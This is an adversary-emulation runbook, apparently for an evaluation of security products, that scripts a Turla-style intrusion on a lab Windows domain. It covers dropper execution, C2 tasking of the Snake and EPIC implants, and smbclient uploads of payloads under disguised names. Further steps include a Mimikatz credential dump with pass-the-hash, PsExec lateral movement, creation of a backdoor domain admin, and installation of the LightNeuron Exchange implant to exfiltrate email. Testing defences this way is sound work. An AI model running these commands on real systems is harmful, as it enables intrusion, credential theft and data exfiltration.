# Snake Protections Scenario

In 

Legend of symbols:

  • 💡 - callout notes
  • - extremely important note
  • ➡️ - Switching to another session
  • - Sign out of something

# Protections Setup

➡️ RDP, do not SSH, to the Kali attacker machine (176.59.15.33).

  • Open a new terminal window, cd to the cloned repo control server, and start the control server:
cd /opt/day2/turla/Resources/control_server
rm logs.txt
sudo ./controlServer -c ./config/turla_day2.yml
  • Ensure the EPIC, Snake, and LightNeuron handlers started up.

  • Within your Kali control server terminal window, right click and select "Split Terminal Horizontally". Be careful not to terminate the control server.

  • In the new terminal window, change directory to the control server repo:

cd /opt/day2/turla/Resources/control_server

# Test 8: Watering Hole

🎤 Voice Track:

Test 8 emulates Turla's initial access attempt via a watering hole attack targeting user Egle, who downloads the EPIC dropper.


# ☣️ Procedures

➡️ RDP to Azuolas (10.100.40.103) as Egle:

Username Password
nk\Egle Producer1!
  • Open Microsoft Edge and browse to nato-int.com.

  • Wait for redirection to anto-int.com.

  • After redirection you will prompted to update NotFlash. Click to download the update (NFVersion_5e.exe) bundled with EPIC (a.k.a. Tavdig/Wipbot). DO NOT EXECUTE THE FILE.

  • Open File Explorer and browse to Downloads


# 🗿 Source Code

# 🔬 Cited Intelligence

# Test 9: Execute EPIC

🎤 Voice Track:

Test 9 emulates execution of the EPIC installer to achieve initial access and perform some discovery via the EPIC implant.


# ☣️ Procedures

➡️ Return to your Kali C2 server

  • Open a new terminal tab and name it smbclient. Copy the EPIC dropper executable to Windows host, Azuolas:
smbclient -U 'nk\EgleAdmin'%'Producer1!' //10.100.40.103/c$ -c 'put /opt/day2/turla/Resources/EPIC/SimpleDropper/SimpleDropper/bin/SimpleDropper_https.exe Users\egle\Downloads\NFVersion_5e.exe'

➡️ Return to your RDP session as Egle

  • Open File Explorer > Downloads

  • Double click on the downloaded NFVersion_5e.exe to run it.

  • Wait 1 minute for it to finish running.

  • Close out of all tabs and sign out of your RDP session.

  • Re-RDP to Azuolas (10.100.40.103) as Egle:

Username Password
nk\Egle Producer1!
  • Open Microsoft Edge and browse to https://drebule.nk.local/owa. Log in as Egle:
Username Password
nk\Egle Producer1!

➡️ Set a timer for 2 minutes then switch to your Kali control server terminal and confirm that a new implant has registered and the automated discovery output has been returned in the server log.

NOTE: The injector will wait 2 minutes, before injecting EPIC's Guard DLL into explorer.exe and, subsequently, EPIC's worker DLL into Microsoft Edge.

  • Within the terminal window, split your terminal horizontally via right-click -> split terminal. Be careful not to accidentally terminate the control server.

  • In your lower terminal tab, task the EPIC implant with the following set of discovery commands:

cd /opt/day2/turla/Resources/control_server
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | systeminfo && net group "Domain Computers" /domain'

# 🗿 Source Code

# 🔬 Cited Intelligence

# Test 10: Install Snake on First Target

🎤 Voice Track:

Test 10 emulates Turla exploiting a vulnerable driver to install the Snake rootkit on the Azuolas system and then performing discovery on Azuolas to discover a file server and associated file server admin.


# ☣️ Procedures

  • ➡️ Switch to your RDP session to azuolas as egle.

  • Open a Powershell prompt and run the following command:

runas /user:nk\egleadmin powershell
  • When prompted, type in the password for EgleAdmin:
Username Password
nk\EgleAdmin Producer1!
  • A new powershell window should pop up. Run the following command to ensure that you are running as nk\EgleAdmin:
whoami

➡️ Return to your Kali C2 server terminal window

  • From your smbclient Kali terminal tab, transfer the Snake installer to Azuolas.
smbclient -U 'nk\EgleAdmin'%'Producer1!' //10.100.40.103/c$ -c 'put /opt/day2/turla/Resources/payloads/epic/snake.exe Users\egle\Desktop\gusbsys.exe'
  • ➡️ Switch to your RDP session to azuolas as egle.

  • Open File Explorer and browse to Desktop

  • From the egle ( NOT egleadmin) powershell terminal, run the following command to execute the Snake rootkit installer with the privilege escalation option:

C:\Users\Egle\Desktop\gusbsys.exe -f
  • Within the RDP session, go to your Edge window. Perform a hard refresh on the current page by pressing Ctrl+Shift+R.

➡️ Return to your Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.

➡️ Return to your Kali C2 server terminal window.

  • From your lower Kali C2 terminal window, task the Snake rootkit to run the following process discovery command:
# Discover running processes
cd /opt/day2/turla/Resources/control_server
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
  • Verify that the enumerated processes output contains a process running under EgleAdmin
grep 'NK\\EgleAdmin' logs.txt -i

This should return output similar to the following:

powershell.exe                2868 RDP-Tcp#6                  5     79,140 K Unknown         NK\egleadmin                                            0:00:00 N/A
conhost.exe                   7368 RDP-Tcp#6                  5     18,088 K Unknown         NK\egleadmin                                            0:00:00 N/A
  • Wait 1 minute then execute the next discovery command to enumerate EgleAdmin's groups:
# Enumerate details on EgleAdmin to find group membership
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "user /domain EgleAdmin"}'

Verify that File Server Admins is listed as one of the groups that EgleAdmin is a member of.

  • Wait 1 minute then execute the next discovery command to the drive mapped to the file server:
# Discover that the local machine has a drive mapped to the file server
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "use", "runas": "nk\\Egle"}'

Verify that the home drive is mapped to the file server host berzas (10.100.30.204).


# 🗿 Source Code

# 🔬 Cited Intelligence

# Test 11: Snake Lateral Movement to File Server

🎤 Voice Track:

Test 11 emulates Turla using the discovered admin account to laterally move to the file server and install the Snake rootkit on it, and then using Powershell to perform Active Directory user, group, and computer discovery.


# ☣️ Procedures

➡️ RDP into berzas (10.100.30.204) as EgleAdmin:

Username Password
nk\EgleAdmin Producer1!
  • Close any spurious windows

➡️ Return to your Kali C2 server

  • From your smbclient Kali terminal tab, copy PsExec and the second Snake installer to Azuolas.
smbclient -U 'nk\EgleAdmin'%'Producer1!' //10.100.40.103/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/PsExec.exe Windows\System32\file_svc_mgr.exe'
smbclient -U 'nk\EgleAdmin'%'Producer1!' //10.100.40.103/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/installer_v2.exe Windows\System32\cmu_svc_v2.exe'

➡️ Return to your RDP session to Azuolas (10.100.40.103) as Egle and look for indications of vendor blocking activity.

  • Open File Explorer and browse to C:\Windows\System32. Order files by date.

  • In the EgleAdmin Powershell terminal, run the following command to execute PsExec, which will run the Snake installer on the file server berzas:

C:\Windows\System32\file_svc_mgr.exe \\berzas -accepteula -s -c "C:\Windows\System32\cmu_svc_v2.exe"
  • Check both the Egle and EgleAdmin RDP windows for indications of the vendor blocking the activity.

➡️ Return to your RDP session to berzas (10.100.30.204) as EgleAdmin

  • Open Edge and navigate to https://www.google.com. Perform a search on File server configuration best practices, but don't click on any results.

➡️ Check the Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.

  • From your lower Kali C2 control server terminal window, task Snake to check if the ActiveDirectory PowerShell module is installed.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Get-Module -ListAvailable -Name ActiveDirectory"}'

Verify that you see output. If the implant returns empty output, please contact your lead.

  • Wait 1 minute before tasking Snake to collect a list of Active Directory groups containing the word "management", as members of these groups will likely have elevated permissions on the network.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroup -Filter * | Where-Object Name -Match \"management\" | Select Name"}'

Verify that Server Management is included in the results.

  • Wait 1 minute before tasking Snake to obtain the usernames of accounts within the Server Management domain group. This will instruct Turla on users to target next.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Server Management\" | Select Name,SamAccountName"}'

Verify that ZilvinasAdmin shows up in the list of accounts.

  • Wait 1 minute before tasking Snake to obtain the usernames of accounts within the Domain Admins domain group.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Domain Admins\" | Select Name,SamAccountName"}'

Verify that ZilvinasAdmin shows up in the list of accounts.

  • Wait 1 minute before tasking Snake to discover domain users. Ensure Zilvinas and ZilvinasAdmin appear in the output.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADUser -Filter {LastLogonDate -ne 0} -Properties * | Select Name,SamAccountName"}'
  • Finally, wait 1 minute before tasking Snake to obtain a list of domain computers and some of their information (IP addresses, DNS names, and description).
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | Select Name,DnsName,IPv4Address,Description"}'

Ensure that Zilvinas' Workstation appears in the Description field for uosis


# 🗿 Source Code

# 🔬 Cited Intelligence

# Test 12: Credential Dumping, Lateral Movement, and Persistence

🎤 Voice Track:

Test 12 emulates Turla performing credential dumping on the file server, and then performing lateral movement to the domain admin's workstation and performing additional persistence by creating a new domain admin account.


# ☣️ Procedures

➡️ Start a new RDP session to uosis (10.100.40.102) as Zilvinas:

Username Password
nk\Zilvinas Producer2!
  • Click on the search bar and search for powershell. Right click powershell and then click "Run as Administrator".

  • When prompted, type in the username and password for ZilvinasAdmin:

Username Password
nk\ZilvinasAdmin Producer2!
  • A new powershell window should pop up. Run the following command to ensure that you are running as nk\ZilvinasAdmin:
whoami

➡️ Return to your Kali C2 server

  • From the smbclient Kali terminal tab, copy MimiKatz, PsExec, and the Snake installer, to the file server berzas:
smbclient -U 'nk\EgleAdmin'%'Producer1!' //10.100.30.204/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/mimikatz.exe Windows\System32\loadperf.exe'
smbclient -U 'nk\EgleAdmin'%'Producer1!' //10.100.30.204/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/PsExec.exe Windows\System32\fs_mgr.exe'
smbclient -U 'nk\EgleAdmin'%'Producer1!' //10.100.30.204/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/installer_v3.exe Windows\System32\cmu_svc.exe'

➡️ Go back to the RDP session to Berzas (10.100.30.204) as EgleAdmin:

  • Open File Explorer and browse to C:\Windows\System32. Order files by date.

  • Open command prompt (cmd) as an administrator. If prompted for credentials, use the following:

Username Password
nk\EgleAdmin Producer1!
  • In the admin cmd prompt, run Mimikatz to dump all NTLM hashes from LSASS.exe:
C:\Windows\System32\loadperf.exe pr::d slsa::lop quit 
  • Verify that the password and NTLM hash for ZilvinasAdmin appears in the output.
    • In the Command Prompt, press CTRL+F and in the "Find what:" field, enter * Username : ZilvinasAdmin
    • You may have to go up a few results to find the hash and password
    • The output should contain:
  •     * Username : ZilvinasAdmin
        * Domain   : NK
        * NTLM     : f3fcd61f987a97da49ce5f650b4e6539
        * SHA1     : fc8c801521140666c793108b67716caf4c4189f4
        * DPAPI    : b06d7bea8849897b811e1d73ab22726c
        tsPkG : 
    --
        * Username : ZilvinasAdmin
        * Domain   : NK
        * Password : Producer2!
        kErberoS : 
        * Username : ZilvinasAdmin
        * Domain   : NK.LOCAL
        * Password : (null)
        sSp : 
        crEdMan :
  • Wait 1 minute and then in the same elevated cmd prompt, perform pass-the-hash via MimiKatz using ZilvinasAdmin's NTLM hash to run PsExec and install Snake on the target workstation.

C:\Windows\System32\loadperf.exe pr::d "slsa::htp /user:ZilvinasAdmin /ntlm:f3fcd61f987a97da49ce5f650b4e6539 /domain:nk.local /remotepc:uosis /pexe:C:\Windows\System32\fs_mgr.exe /sys:1 /prun:C:\Windows\System32\cmu_svc.exe" quit
  • Check both the berzas (10.100.30.204) and uosis (10.100.40.102) RDP sessions for indicators of blocked activity.

➡️ Return to your RDP session to uosis (10.100.40.102) as Zilvinas:

  • Open Edge and navigate to https://drebule.nk.local/owa. Log in as Zilvinas:
Username Password
nk\Zilvinas Producer2!
  • Spend a couple minutes reading through any unread emails to wait for the implant to start beaconing back to the C2 server.

➡️ Return to the Kali C2 terminal window and verify that a new implant session is beaconing back to the C2 server.

  • From the lower terminal window, task Snake to enumerate running processes on the machine to discover processes under ZilvinasAdmin.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
  • Verify that we find processes running under ZilvinasAdmin
grep 'NK\\ZilvinasAdmin' logs.txt -i 

This should return output similar to the following:

powershell.exe                8152 RDP-Tcp#2                  3     83,280 K Unknown         NK\ZilvinasAdmin                                        0:00:00 N/A
conhost.exe                    312 RDP-Tcp#2                  3     17,356 K Unknown         NK\ZilvinasAdmin                                        0:00:00 N/A
  • Wait 1 minute, then instruct Snake to create a new domain user Leshy using an access token from one of the ZilvinasAdmin processes. Leshy will be used as a backdoor domain admin account for persistence on the domain.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net user leshy Password12345 /add /domain", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute, then instruct Snake to add Leshy to the Domain Admins group.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net group \"Domain Admins\" leshy /add /domain", "runas": "nk\\zilvinasadmin"}'

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Test 13: Lateral Movement to Exchange Server and LightNeuron Capabilities

🎤 Voice Track:

Test 13 emulates Turla laterally moving to the Exchange server, installing the LightNeuron implant there, and sending several discovery commands to the LightNeuron implant and collecting and exfiltrating email traffic.


# ☣️ Procedures

➡️ Start a new RDP session to drebule (10.100.30.203) as ZilvinasAdmin:

Username Password
nk\ZilvinasAdmin Producer2!

➡️ Return to your Kali C2 server

  • In your Kali terminal window, copy the LightNeuron files to uosis
sudo smbclient -U 'nk\ZilvinasAdmin'%'Producer2!' //10.100.40.102/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/ln_transport_agent.dll Windows\System32\mtxconf.dll'
sudo smbclient -U 'nk\ZilvinasAdmin'%'Producer2!' //10.100.40.102/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/n_installer_aux.dll Windows\System32\mtxcli.dll'
sudo smbclient -U 'nk\ZilvinasAdmin'%'Producer2!' //10.100.40.102/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/msiex.ps1 Windows\System32\msiex.ps1'
sudo smbclient -U 'nk\ZilvinasAdmin'%'Producer2!' //10.100.40.102/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/rules.xml Windows\System32\wdr.rules.xml'
sudo smbclient -U 'nk\ZilvinasAdmin'%'Producer2!' //10.100.40.102/c$ -c 'put /opt/day2/turla/Resources/payloads/snake/winmail.dat Windows\System32\perfe009.dat'

➡️ Return to your RDP session to uosis (10.100.40.102) as Zilvinas

  • Open File Explorer and browse to C:\Windows\System32. Order files by date.

  • Start an elevated command prompt. When prompted for credentials, use:

Username Password
nk\ZilvinasAdmin Producer2!
  • In the elevated cmd prompt, run the following commands to copy LightNeuron files. After each command, check your RDP session to drebule (10.100.30.203) to look for any indicators of blocked vendor activity.
copy C:\Windows\System32\mtxconf.dll "\\drebule\C$\Program Files\Microsoft\Exchange Server\V15\TransportRoles\agents\Hygiene\Microsoft.Exchange.Transport.Agent.ConnectionFiltering.dll"
  • Wait 1 minute before copying the next file (LightNeuron companion DLL):
copy C:\Windows\System32\mtxcli.dll "\\drebule\C$\Program Files\Microsoft\Exchange Server\v15\bin\exdbdata.dll"
  • Wait 1 minute before copying the next file (installation script):
copy C:\Windows\System32\msiex.ps1 \\drebule\C$\Windows\System32\msiex.ps1
  • Wait 1 minute before copying the rules file:
copy C:\Windows\System32\wdr.rules.xml \\drebule\C$\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\msmdat.xml
  • Wait 1 minute before copying the last config file:
copy C:\Windows\System32\perfe009.dat "\\drebule\C$\Program Files\Microsoft\Exchange Server\v15\bin\winmail.dat"
  • Wait 1 minute and then run the following command in the elevated cmd prompt to install LightNeuron remotely using WMI and Powershell:
wmic /node:drebule /privileges:enable /output:STDOUT process call create "cmd.exe /c powershell.exe -File C:\Windows\System32\msiex.ps1 > C:\Windows\Temp\msiexinstallation.log 2>&1"

Verify that the WMIC output shows a ReturnValue of 0.

  • Check your RDP session to drebule (10.100.30.203) to look for any indicators of blocked activity.

➡️ Return to your RDP session to uosis (10.100.40.102) as ZilvinasAdmin.

  • Wait 1 minute and then run the following command in the elevated cmd prompt to check the installation log for any errors:
type \\drebule\C$\Windows\Temp\msiexinstallation.log

If the output contains any errors, notify your lead.

➡️ Return to your Kali C2 server

  • From the Kali C2 lower terminal window, task LightNeuron to perform system network configuration discovery:
./evalsC2client.py --set-task info@nk.local '5 | ipconfig /all'
  • If no response is received after 5 minutes, check the postfix logs on the Kali server to make sure the email was intercepted and processed correctly by LightNeuron.

    grep postfix /var/log/syslog
    • If there is a reject entry, that means the email, destined for a nonexistent user, was processed by the Exchange server, meaning that LightNeuron was either not successfully installed or is not working properly.

➡️ Switch to your RDP session to drebule (10.100.30.203) to look for any indicators of blocked activity.

  • Open File Explorer and browse to C:\Windows\serviceprofiles\networkservice\appdata\Roaming\Microsoft\Windows

    • Confirm the presence of an msxfer.dat, this implies the LightNeuron transport agent was successfully installed and intercepted the email containing C2 commands
  • ➡️ Return to your RDP session to uosis (10.100.40.102) as Zilvinas.

  • Go to your Edge browser window with the OWA page. If you do not have an Edge browser with OWA open from a previous step, open Edge then navigate to https://drebule.nk.local/owa and log in as Zilvinas:

Username Password
nk\Zilvinas Producer2!
  • Create a new email:

  • The email recipient should be the user egle@nk.local

  • The email subject should be SAP Integration Issue

  • The following text should be pasted in as the email body:

    Hi Egle,
    After our meeting earlier I spoke with Tenko about the SAP integration issue that was preventing the users from logging in. I did a little digging and noticed there is an authentication error on the SAP server.
    
    When you get a few minutes could you check to make sure the service account is still active and the credentials have not expired? The account name is SVC_SAP2.
  • Send the email

➡️ Switch to your RDP window to Azuolas (10.100.40.103) as Egle.

  • Go to your Edge browser window. You should still be logged into OWA from earlier.

  • You should see the email from Zilvinas@nk.local. Try reloading the page if needed.

  • Reply to the email from Zilvinas.

  • The following text should be pasted in as the email reply body:

    Zilvinas,
    
    I just checked on the service account. It appears that the account was still active, but the password had expired. I've adjusted the settings for the account, so the password should not expire again.
    
    The new password is: dfsbH%T5RWf3bwq3aeGR$3%
    
    Let me know if this fixes the authentication issue.
  • Send the email

➡️ Return to the Kali C2 server lower terminal window. Task the LightNeuron implant to exfiltrate the email log file:

./evalsC2client.py --set-task info@nk.local '3 | 0'
  • The file contents will be logged by the control server. Verify that exfil was logged by the control server by checking the terminal window with the server output or by checking the server log file. The logs should contain the password Egle sent to Zilvinas:
grep 'dfsbH%T5RWf3bwq3aeGR$3%' /opt/day2/turla/Resources/control_server/logs.txt

# 🗿 Source Code

# 🔬 Cited Intelligence